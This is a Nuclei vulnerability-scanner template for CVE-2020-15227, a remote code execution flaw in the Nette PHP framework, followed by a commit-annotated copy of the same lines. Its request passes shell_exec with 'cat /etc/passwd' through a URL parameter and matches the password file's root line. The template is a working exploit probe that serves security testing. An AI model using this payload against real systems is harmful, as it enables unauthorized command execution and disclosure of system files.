nuclei-templates/cves/2020/CVE-2020-15227.yaml

id: CVE-2020-15227

info:
  name: Nette Framework RCE
  author: becivells
  severity: critical
  description: Nette versions before 2.0.19, 2.1.13, 2.2.10, 2.3.14, 2.4.16, 3.0.6 are vulnerable to an code injection attack by passing specially formed parameters to URL that may possibly leading to RCE. Nette is a PHP/Composer MVC Framework.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2020-15227
    - https://github.com/nette/application/security/advisories/GHSA-8gv3-3j7f-wg94
    - https://www.pwnwiki.org/index.php?title=CVE-2020-15227_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E#
    - https://github.com/Mr-xn/Penetration_Testing_POC/blob/02546075f378a9effeb6426fc17beb66b6d5c8ee/books/Nette%E6%A1%86%E6%9E%B6%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C(CVE-2020-15227).md
  tags: cve,cve2020,nette,rce
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.80
    cve-id: CVE-2020-15227
    cwe-id: CWE-74

requests:
  - method: GET
    path:
      - "{{BaseURL}}/nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1"

    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
Added CVE-2020-15227 2021-05-22 11:52:45 +00:00			`id: CVE-2020-15227`

			`info:`
			`name: Nette Framework RCE`
			`author: becivells`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`severity: critical`
Added CVE-2020-15227 2021-05-22 11:52:45 +00:00			`description: Nette versions before 2.0.19, 2.1.13, 2.2.10, 2.3.14, 2.4.16, 3.0.6 are vulnerable to an code injection attack by passing specially formed parameters to URL that may possibly leading to RCE. Nette is a PHP/Composer MVC Framework.`
Removed pipe (\|) character from references, because the structure requires it to be a string slice, not a string Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 2021-08-18 11:37:49 +00:00			`reference:`
Satisfying the linter (all errors and warnings) * whitespace modifications only 2021-08-19 14:44:46 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2020-15227`
			`- https://github.com/nette/application/security/advisories/GHSA-8gv3-3j7f-wg94`
			`- https://www.pwnwiki.org/index.php?title=CVE-2020-15227_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E#`
			`- https://github.com/Mr-xn/Penetration_Testing_POC/blob/02546075f378a9effeb6426fc17beb66b6d5c8ee/books/Nette%E6%A1%86%E6%9E%B6%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C(CVE-2020-15227).md`
Added CVE-2020-15227 2021-05-22 11:52:45 +00:00			`tags: cve,cve2020,nette,rce`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.80`
			`cve-id: CVE-2020-15227`
			`cwe-id: CWE-74`
Added CVE-2020-15227 2021-05-22 11:52:45 +00:00
			`requests:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1"`

			`matchers-condition: and`
			`matchers:`

			`- type: regex`
			`regex:`
matcher update to handle edge cases 2021-07-24 21:35:55 +00:00			`- "root:.*:0:0:"`
Added CVE-2020-15227 2021-05-22 11:52:45 +00:00
			`- type: status`
			`status:`
			`- 200`